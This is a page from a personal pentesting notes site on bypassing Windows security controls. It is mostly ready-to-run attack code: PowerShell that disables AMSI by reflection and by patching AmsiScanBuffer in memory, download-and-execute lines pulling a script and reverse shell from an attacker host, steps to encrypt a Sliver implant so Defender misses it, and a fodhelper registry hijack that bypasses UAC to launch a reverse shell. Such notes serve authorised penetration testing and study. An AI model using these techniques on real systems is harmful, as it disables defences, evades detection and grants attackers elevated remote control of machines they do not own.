Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • AMSI
  • Powershell Only
  • Global
  • Windows Defender
  • PELoader + pe2shc
  • UAC
  • Check UAC settings
  • Common bypass with AutoElevate
  • More bypasses with UACME
  1. Windows Pentesting

Bypassing Security

PreviousRelay attacksNextFile Transfer

Last updated 1 year ago

AMSI

Powershell Only

$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$me = $field.GetValue($field)
$me = $field.SetValue($null, [Boolean]"hhfff")

# Download and execute amsi.ps1 globally to globally bypass amsi
IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/amsi.ps1'))

Global 

$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

# Download and execute reverse shell or any other script
IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/x.ps1'))

Windows Defender

For csharp, pe or raw executable's use Nimcrypt2:

nimcrypt -f INPUT.exe -t pe -s -e -o OUTPUT_enc.exe

  • -t for filetype

  • -e to use encryption

PELoader + pe2shc

We first convert the PE to shellcode:

> .\pe2shc.exe sliver_PE.exe

Next, we use PE_loader.exe to encrypt the shellcode:

> set hagrid=enc sliver_PE.shc.exe
> .\PELoader.exe
argument: enc sliver_PE.shc.exe
Encrypting File

This will output "sliver_PE.shc.exe.enc". Upload this file to the target together with PELoader.exe. Of course rename PELoader.exe to incendiumrocks.exe. After that set the env and decrypt and execute the encrypted shellcode (our Sliver implant)

> set hagrid=mdll sliver_PE.shc.exe.enc
> .\incendiumrocks.exe

Done, check your listener in Sliver

UAC

User Account Control (UAC) is a key part of Windows security. UAC reduces the risk of malware by limiting the ability of malicious code to execute with administrator privileges.

Check UAC settings

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

if 5(default) it will ask the administrator to confirm to run non Windows binaries with high privileges:

Common bypass with AutoElevate

Some executables can auto-elevate, achieving high IL without any user intervention. This applies to most of the Control Panel's functionality and some executables provided with Windows.

For an application, some requirements need to be met to auto-elevate:

  • The executable must be signed by the Windows Publisher

  • The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/

To check if a binary has autoElevate, we can use sigcheck:

C:\tools\> sigcheck64.exe -m c:/windows/system32/msconfig.exe
...
<asmv3:application>
	<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
		<dpiAware>true</dpiAware>
		<autoElevate>true</autoElevate>
	</asmv3:windowsSettings>
</asmv3:application>

Fodhelper

Fodhelper.exe is one of Windows default executables in charge of managing Windows optional features, including additional languages, applications not installed by default, or other operating system characteristics. Like most of the programs used for system configuration, fodhelper can auto elevate when using default UAC settings so that administrators won't be prompted for elevation when performing standard administrative tasks. Fodhelper can be abused without having access to a GUI.

When Windows opens a file, it checks the registry to know what application to use.

We can set the following keys for the fodhelper binary:

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="cmd.exe /c /windows/tasks/shell.exe"

C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.

C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.

And then proceed to execute fodhelper.exe, which in turn will trigger the execution of our reverse shell.

C:\> fodhelper.exe

More bypasses with UACME

  • Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.

We first generate a Sliver implant and upload it to our Windows attacking host (not target). We will need and .

https://github.com/hasherezade/pe_to_shellcode
https://github.com/Hagrid29/PELoader
GitHub - S3cur3Th1sSh1t/Amsi-Bypass-Powershell: This repo contains some Amsi Bypass methods i found on different Blog Posts.GitHub
GitHub - icyguider/Nimcrypt2: .NET, PE, & Raw Shellcode Packer/Loader Written in NimGitHub
GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub
Logo
Logo
Logo